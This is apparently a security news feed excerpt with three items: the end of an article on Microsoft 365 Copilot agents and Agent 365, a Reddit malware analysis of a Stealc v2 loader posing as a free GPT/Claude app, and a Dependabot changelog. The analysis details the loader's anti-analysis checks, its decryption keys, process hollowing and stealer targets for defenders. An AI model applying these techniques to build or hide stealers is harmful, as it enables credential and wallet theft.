<p>Adding to the confusion, the company offers several specialized enterprise versions of Copilot for specific purposes, including <a href="https://learn.microsoft.com/en-us/microsoft-copilot-studio/" target="_blank" rel="noreferrer noopener">Microsoft Copilot Studio</a>, <a href="https://learn.microsoft.com/en-us/copilot/security/" target="_blank" rel="noreferrer noopener">Microsoft Security Copilot</a>, <a href="https://learn.microsoft.com/en-us/azure/copilot/" target="_blank" rel="noreferrer noopener">Azure Copilot</a>, and <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" target="_blank">GitHub Copilot</a>, as well as additional Copilot “experiences” for Microsoft products such as <a href="https://learn.microsoft.com/en-us/dynamics365/copilot/ai-get-started" target="_blank" rel="noreferrer noopener">Dynamics 365</a>, <a href="https://learn.microsoft.com/en-us/power-platform/copilot" target="_blank" rel="noreferrer noopener">Power Platform</a>, and <a href="https://learn.microsoft.com/en-us/fabric/fundamentals/copilot-fabric-overview" target="_blank" rel="noreferrer noopener">Microsoft Fabric</a>. </p>



<p>Also available: agents in M365 Copilot built for specific industries, including <a href="https://learn.microsoft.com/en-us/copilot/finance/" target="_blank" rel="noreferrer noopener">finance</a>, <a href="https://learn.microsoft.com/en-us/microsoft-sales-copilot/" target="_blank" rel="noreferrer noopener">sales</a>, and <a href="https://learn.microsoft.com/en-us/microsoft-copilot-service/" target="_blank" rel="noreferrer noopener">service</a>.</p>



<h2 class="wp-block-heading">From chatbot to multi-model researcher to agentic powerhouse</h2>



<p>Microsoft has moved away from a single-model approach for its AI assistant. Copilot Chat has evolved into a Frontier interface, allowing users to select among different LLMs (large language models) such as GPT-5.4 and Anthropic Claude 4 for specialized tasks.</p>



<p>A persistent AI risk for enterprises is overly permissive data access. Because Copilot inherits the permissions of the user, any file that is improperly shared within an organization can be surfaced by the AI. To combat the issue of business-critical files that are at risk due to inappropriate classification, <a href="https://learn.microsoft.com/en-us/purview/copilot-in-purview-overview" target="_blank" rel="noreferrer noopener">Microsoft has integrated Purview Data Security Posture Management (DSPM)</a> more deeply into Copilot, alerting users when they are generating content from unclassified or sensitive sources.</p>



<p>Other recently introduced M365 Copilot features include:</p>



<ul class="wp-block-list">
<li><a href="https://support.microsoft.com/en-us/topic/get-started-with-researcher-in-microsoft-365-copilot-e63ab760-f3de-4c47-ae87-dad601b0e9c4" target="_blank" rel="noreferrer noopener">Copilot Researcher</a><strong>:</strong> This feature allows the assistant to pull from multi-model intelligence, comparing perspectives from different AI models side-by-side to reduce hallucinations.</li>



<li><a href="https://support.microsoft.com/en-us/topic/get-started-with-microsoft-365-copilot-notebooks-0775e693-11c6-4d80-8aba-fcc81a737a06" target="_blank" rel="noreferrer noopener">Copilot Notebooks</a><strong>:</strong> Notebooks allow you to ground the AI in specific project context. These can now be exported directly into structured Excel spreadsheets or PowerPoint decks, bypassing the need for manual copy and pasting.</li>



<li><a href="https://support.microsoft.com/en-us/office/interpreter-in-microsoft-teams-meetings-and-calls-c7efe2bb-535d-42ab-a5c4-d2d91619b46d" target="_blank" rel="noreferrer noopener">Teams Interpreter</a><strong>:</strong> Integrated directly into Teams Phone, Interpreter is designed to provide real-time, AI-powered language interpretation during live calls, a boon for global enterprise operations.</li>



<li><a href="https://www.computerworld.com/article/4080435/m365-copilot-now-lets-you-build-apps-and-agents-with-natural-language-prompts.html">App Builder</a>: A no-code tool that lets business users create apps, workflows, and agents using natural language prompts. It’s essentially a “lite” version of Microsoft’s high-end Copilot Studio environment for developers.</li>



<li><a href="https://www.computerworld.com/article/4163305/agent-mode-is-now-available-in-microsoft-word-excel-and-powerpoint.html">Agents for Word, Excel, and PowerPoint</a>: Advanced modes that allow Copilot to take direct action on documents and files rather than simply suggest changes. </li>
</ul>



<p>Even more notable was the June <a href="https://www.computerworld.com/article/4186190/microsoft-launches-copilot-cowork-with-usage-based-pricing.html">launch of Copilot Cowork</a>, which Microsoft pitches as an AI agent for M365 Copilot that can independently perform long-running, multi-step tasks, even when a user’s computer is turned off. Unlike Anthropic’s Claude Cowork, which can interact directly with files and applications on a user’s computer, Copilot Cowork runs in Microsoft’s cloud environment and acts on documents held in a customer’s Microsoft 365 tenant. Copilot Cowork requires a Microsoft 365 Copilot license and is billed based on usage.</p>



<p>Another announcement that caused a stir was Microsoft’s unveiling of Scout, its first <a href="https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html">autonomous agent built on the open-source OpenClaw platform</a>. By integrating OpenClaw-style agentic capabilities, Microsoft hopes to transform Copilot into an always-on system that can, for instance, scan Outlook email inboxes and calendars to suggest daily priorities. Microsoft’s implementation addresses security concerns around self-hosted agents by isolating professional-grade “autopilots” within specific roles and applying managed permission guardrails. Scout is available as an “experimental release” to customers of Microsoft’s Frontier program.</p>



<p>Industry analysts note that these tools are new and unproven, and IT leaders should use caution when testing them and evaluating costs.</p>



<h2 class="wp-block-heading">Managing AI agent sprawl: Enter Agent 365</h2>



<p>As organizations move beyond simple chat to building custom <a href="https://learn.microsoft.com/en-us/microsoft-365/copilot/extensibility/overview-declarative-agent" target="_blank" rel="noreferrer noopener">declarative agents</a> in Copilot Studio, the risk of <a href="https://www.cio.com/article/4129630/shadow-ai-practices-a-wakeup-call-for-enterprises.html" target="_blank">shadow AI </a>has become a concern. Gartner reports that 86% of IT leaders require additional governance to manage these agents.</p>



<p>Available as an add-on subscription for Microsoft 365 or bundled in the top-end M365 E7 package, <a href="https://www.computerworld.com/article/4092436/microsoft-unveils-agent-365-to-help-it-manage-ai-agent-sprawl.html">Agent 365</a> acts as a control plane for the AI ecosystem. Unlike the user-facing Copilot, Agent 365 is a back-end dashboard that allows IT admins to manage agents in various ways:</p>



<ol start="1" class="wp-block-list">
<li><strong>Registry and lifecycle management:</strong> View every agent — Microsoft, third-party, or internally developed — in a “single-pane-of-glass” dashboard.</li>



<li><strong>Policy-based guardrails:</strong> Admins can set global rules to prevent agents from accessing high-sensitivity data (like payroll), even if the human user has permission.</li>



<li><strong>Unified ROI analytics:</strong> Leaders can track which agents are actually driving value, allowing for precise seat-count adjustments during renewal cycles.<br><br></li>
</ol>



<h3 class="wp-block-heading">Microsoft Agent 365 quick facts</h3>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table><tbody><tr><td>Pricing</td><td>$15 / user / month (as an add-on) or included in the Microsoft 365 E7 suite ($99 / user / month)</td></tr><tr><td>Core functions</td><td>Centralized registry, access control, and performance analytics for all AI agents</td></tr><tr><td>Objective</td><td>Designed to prevent agent sprawl and ensure agents from partners (e.g., Adobe, ServiceNow, etc.) follow M365 security rules</td></tr></tbody></table> </div></figure>



<p>Gartner says that Agent 365 is still a work in progress and has yet to prove it can actually reduce costs in IT operations. The analyst firm advises customers to assess Agent 365 but not necessarily move to it or the E7 bundle right away.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading">Copilot vs. AI in other productivity apps</h2>



<p>Most vendors in the productivity and collaboration software market have added genAI and agentic tools to their offerings at this point.</p>



<p>The rivalry between Microsoft and Google has heightened in 2026. While Google has <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html#:~:text=Gemini%E2%80%99s%20simplest%20struggles">faced criticism</a> for a messy transition from the Google Assistant to Gemini, it remains a price leader by <a href="https://www.computerworld.com/article/3804055/google-ups-workspace-price-makes-gemini-ai-features-available-for-free.html">embedding Gemini features directly</a> into most tiers of its office suite, <a href="https://www.computerworld.com/article/3570821/google-workspace-explained-googles-answer-to-microsoft-365.html">Google Workspace</a>.</p>



<p>In contrast, Microsoft seems to be threading a needle, tightening Copilot Premium licensing for large enterprises while making basic Copilot features available to smaller customers without an add-on license. The goal may be to standardize AI as a commodity while reserving the high-value agentic features for the highest-paying enterprise customers.</p>



<p>While Microsoft focuses on the productivity suite, Salesforce is positioning Slack as the “agentic operating system” for the enterprise. As of April 2026, <a href="https://www.computerworld.com/article/4153622/slacks-ai-updates-signal-shift-towards-agent-orchestration.html">Slack AI has moved beyond summarizing to orchestrating agentic workflows</a>. This is designed let you trigger complex, multi-step actions across non-Microsoft systems directly from a Slack thread.</p>



<p>Salesforce’s Agentforce platform uses the Atlas Reasoning Engine, which is designed to offer autonomous front-office automation (sales, service, and marketing). For organizations where CRM data is more critical than Word documents, Agentforce is emerging as a formidable, high-ROI alternative to Copilot.</p>



<aside class="sidebar">
<h3><strong>Gartner’s 5 stages of agentic AI evolution</strong></h3>
&gt; Gartner projects that agentic AI could drive approximately 30% of enterprise application software revenue by 2035. The analyst firm’s roadmap  identifies five maturity stages for IT leaders: 

&gt;
<li><strong>2025: AI assistants:</strong> Embedded helpers that simplify tasks but remain dependent on human input</li>
<li><strong>2026: Task-specific agents:</strong> Agents capable of end-to-end complex tasks, such as real-time cybersecurity-threat response</li>
<li><strong>2027: Collaborative agents:</strong> Multi-agent systems that work together across data environments to solve multifaceted business problems</li>
<li><strong>2028: Agentic front ends:</strong> A shift where a third of user experiences move away from native apps toward “agentic interfaces” that navigate multiple apps on behalf of the user</li>
<li><strong>2029: Democratized ecosystems:</strong> A new normal where 50% of knowledge workers actively govern or create agents on demand for complex tasks</li>

</aside>




<p>In March 2026, <a href="https://www.computerworld.com/article/4149464/apple-goes-global-with-key-mdm-tools-and-services-for-business.html">Apple launched Apple Business</a>, a platform designed to integrate Apple Intelligence directly into macOS and iOS. Apple claims its competitive edge is its on-screen awareness. Unlike cloud-heavy competitors, Apple Intelligence is built to act across apps locally, appealing to regulated industries concerned about data leakage.</p>



<p>Apple Business now supports automated Managed Apple Accounts via integration with Microsoft Entra ID, a feature designed to let IT teams manage Apple’s AI features using their Microsoft identity stack.</p>



<p>As Microsoft tightens the reins on free access, the question for enterprise IT leaders is no longer whether Copilot can summarize a meeting, but whether the $30-per-month leap delivers enough agentic automation to justify the cost. For many, the answer will lie in the effectiveness of Agent 365 in bringing order to the burgeoning fleet of AI workers.</p>



<p><em>This article was originally published in February 2025 and most recently updated in July 2026.</em></p>



<h3 class="wp-block-heading">More on Microsoft 365 Copilot:</h3>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4036013/how-it-leaders-unlock-productivity-with-microsoft-365-copilot.html">How IT leaders unlock productivity with Microsoft 365 Copilot</a></li>



<li><a href="https://www.computerworld.com/article/4110646/building-end-to-end-workflows-with-microsoft-365-copilot.html">Building end-to-end workflows with Microsoft 365 Copilot</a></li>



<li><a href="https://www.computerworld.com/article/3479705/how-to-use-microsoft-copilot-for-writing-in-microsoft-365-word-outlook-onenote.html">Microsoft Copilot can boost your writing in Word, Outlook, and OneNote — here’s how</a></li>



<li><a href="https://www.computerworld.com/article/4119411/11-cool-things-copilot-can-do-in-excel.html">11 cool things Copilot can do in Excel</a></li>



<li><a href="https://www.computerworld.com/article/4022584/9-ways-copilot-can-turbocharge-onenote.html">9 ways Copilot can turbocharge OneNote</a></li>



<li><a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">How to curb hallucinations in Copilot (and other genAI tools)</a></li>
</ul>



<p></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Analysis of a new Stealc loader disguised as a fake "GPT/Claude Free" app]]></title>
<description><![CDATA[Just spent the last few hours reversing a sample that's being distributed as a fake offline Claude / GPT desktop client. The binary I got was named GPT_Claude_Free.exe (though it also bundles a Russian video editor decoy to keep up the facade). Under the hood, it's a 3-stage custom crypter delive...]]></description>
<link>https://tsecurity.de/de/3637213/malware-trojaner-viren/analysis-of-a-new-stealc-loader-disguised-as-a-fake-gptclaude-free-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637213/malware-trojaner-viren/analysis-of-a-new-stealc-loader-disguised-as-a-fake-gptclaude-free-app/</guid>
<pubDate>Wed, 01 Jul 2026 03:47:29 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Just spent the last few hours reversing a sample that's being distributed as a fake offline Claude / GPT desktop client. The binary I got was named <code>GPT_Claude_Free.exe</code> (though it also bundles a Russian video editor decoy to keep up the facade).</p> <p>Under the hood, it's a 3-stage custom crypter delivering a Stealc v2 payload. Here's a quick dump of how the packer works and what the payload is doing.</p> <p><strong>Reversing the loader:</strong> First thing it does is run through a bunch of anti-analysis checks. It calls <code>IsDebuggerPresent</code>, checks <code>NtGlobalFlag</code> manually from the PEB (via <code>gs:[0x60]</code>), and queries registry keys for VM stuff (VMware/VirtualBox). There's also a timing loop that spins a custom LCG generator 100k times to mess with basic dynamic analysis.</p> <p>If it passes, it moves to the decryption logic. The payload is tucked away in the <code>.xdata</code> section. It's stored entirely as printable ASCII. It runs through three distinct phases:</p> <ol> <li><strong>Base85 decode:</strong> It uses a custom alphabet translation table at offset <code>0x4073A0</code> (in <code>.rdata</code>).</li> <li><strong>Rolling XOR:</strong> Decrypted stream is XOR'd with a 32-byte key at <code>0x406040</code> (<code>72d57da187da5de93942e1ae1b9dcf20ee2a00f5ff979cb7d5e1a8e79a46584c</code>).</li> <li><strong>AES-256-CBC:</strong> The key is at <code>0x406010</code> (<code>f20daa63a36905e004390c7fc79c79dc73a290b3330868fdad63cbe16a7974d3</code>) and the IV is at <code>0x406030</code> (<code>4e6279de852509f8ce25c6357718ccd2</code>).</li> </ol> <p>Once it has the clean MZ PE in memory, it doesn't write anything to disk. It just performs process hollowing (standard <code>NtAllocateVirtualMemory</code> / relocation adjustments) to inject it directly.</p> <p><strong>Reversing the payload:</strong> The decrypted binary is Stealc v2. If you look at the configuration block (stored inside the <code>.stgcfg</code> section starting with 'CGTS' magic bytes), it's set up to steal basically everything:</p> <ul> <li><strong>Browsers:</strong> Targets credentials, autofill, credit cards, and session cookies from ~30 Chrome/Firefox derivatives.</li> <li><strong>Wallets:</strong> Grabs MetaMask/TokenPocket extension folders and desktop wallet files (Exodus, Electrum, Monero, Coinomi).</li> <li><strong>Tokens:</strong> Scans Local Storage folders for Discord tokens and grabs Telegram <code>tdata</code> directories.</li> <li><strong>Gaming/VPN:</strong> Steam, <a href="http://battle.net/">Battle.net</a>, GOG, WinSCP, FileZilla, and OpenVPN configurations.</li> <li><strong>Recon:</strong> Captures clipboard &amp; screenshots.</li> </ul> <p>It exfiltrates everything via POST requests to the C2 using HTTP headers like <code>X-Gate-Token</code> and <code>X-Build-ID</code>.</p> <p>Decrypted payload hash for anyone who wants to write rules or pivot: <code>1f498b81fd767687f72605e18628fb6b6ba40035325fb6618d519ae88d7a27c2</code></p> <p>Let me know if you run into this family or if you want me to share the decompiled extraction script.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Wrong-Quantity6957"> /u/Wrong-Quantity6957 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uil0eo/analysis_of_a_new_stealc_loader_disguised_as_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uil0eo/analysis_of_a_new_stealc_loader_disguised_as_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.384.0]]></title>
<description><![CDATA[What's Changed

Bazel: Fix prerelease filtering with same-release-line scoping by @v-HaripriyaC in #15332
Respect cooldown for Docker digest updates and suppress multi-arch no-ops by @robaiken in #15354
Bypass npmrc min-release-age for transitive npm security updates by @robaiken in #15386
Ratche...]]></description>
<link>https://tsecurity.de/de/3636212/it-security-tools/v03840/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636212/it-security-tools/v03840/</guid>
<pubDate>Tue, 30 Jun 2026 18:19:52 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Bazel: Fix prerelease filtering with same-release-line scoping by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-HaripriyaC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-HaripriyaC">@v-HaripriyaC</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669331291" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15332" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15332/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15332">#15332</a></li>
<li>Respect cooldown for Docker digest updates and suppress multi-arch no-ops by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701287300" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15354" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15354/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15354">#15354</a></li>
<li>Bypass npmrc min-release-age for transitive npm security updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725022446" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15386" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15386/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15386">#15386</a></li>
<li>Ratchet the Sorbet T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731460685" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15399" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15399/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15399">#15399</a></li>
<li>feat(docker): implement single-platform image detection and optimize manifest fetching logic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpinz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpinz">@jpinz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727893963" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15390" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15390/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15390">#15390</a></li>
<li>Fix private registry config not found error not being raised issue in npm_and_yarn by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729495132" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15394" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15394/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15394">#15394</a></li>
<li>don't fail if nuget cred is missing url by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721038688" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15378" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15378/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15378">#15378</a></li>
<li>Type commit_message_options with a value object by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731577963" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15400" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15400/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15400">#15400</a></li>
<li>Type the Dependabot config file parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731644129" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15401" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15401/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15401">#15401</a></li>
<li>Fix Terraform registry replacement typing and credential semantics by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4734067707" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15406" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15406/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15406">#15406</a></li>
<li>fix: avoid path collisions for SHA-pinned GitHub Actions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markhallen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markhallen">@markhallen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317086858" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14806" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14806/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14806">#14806</a></li>
<li>Nix: skip flake inputs pinned to a bare commit SHA by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4740718886" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15412" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15412/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15412">#15412</a></li>
<li>Type the vulnerability version-range renderer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731673648" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15402" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15402/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15402">#15402</a></li>
<li>Add JobCommand enum and Command property to NuGet Job model by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4643997783" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15277" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15277/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15277">#15277</a></li>
<li>Upgrade Ruby to 4.0.5 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bo98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bo98">@Bo98</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333052029" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14830" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14830/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14830">#14830</a></li>
<li>Bump updater-core image to RubyGems/Bundler 4.0.13 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618733501" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15256" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15256/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15256">#15256</a></li>
<li>Fix issue with <code>PrivateRegistryConfigNotFound</code> error incorrectly firing when scope is configured by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746967053" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15416" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15416/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15416">#15416</a></li>
<li>Fake MSBuild SolutionDir during NuGet discovery (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3717692367" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/13756" data-hovercard-type="issue" data-hovercard-url="/dependabot/dependabot-core/issues/13756/hovercard" href="https://github.com/dependabot/dependabot-core/issues/13756">#13756</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729122800" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15392" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15392/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15392">#15392</a></li>
<li>NuGet: Filter all editable files not present prior to discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702669203" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15358" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15358/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15358">#15358</a></li>
<li>Support Central Package Versions updates in XmlFileWriter by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4737397188" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15409" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15409/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15409">#15409</a></li>
<li>[Update Graph] Report empty manifests as present but empty instead of omitting them by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753676533" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15427" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15427/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15427">#15427</a></li>
<li>Fix vcpkg empty PRs for up-to-date baselines by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4747606732" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15420" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15420/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15420">#15420</a></li>
<li>Nix: update NixOS channel tarball inputs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741094986" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15413" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15413/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15413">#15413</a></li>
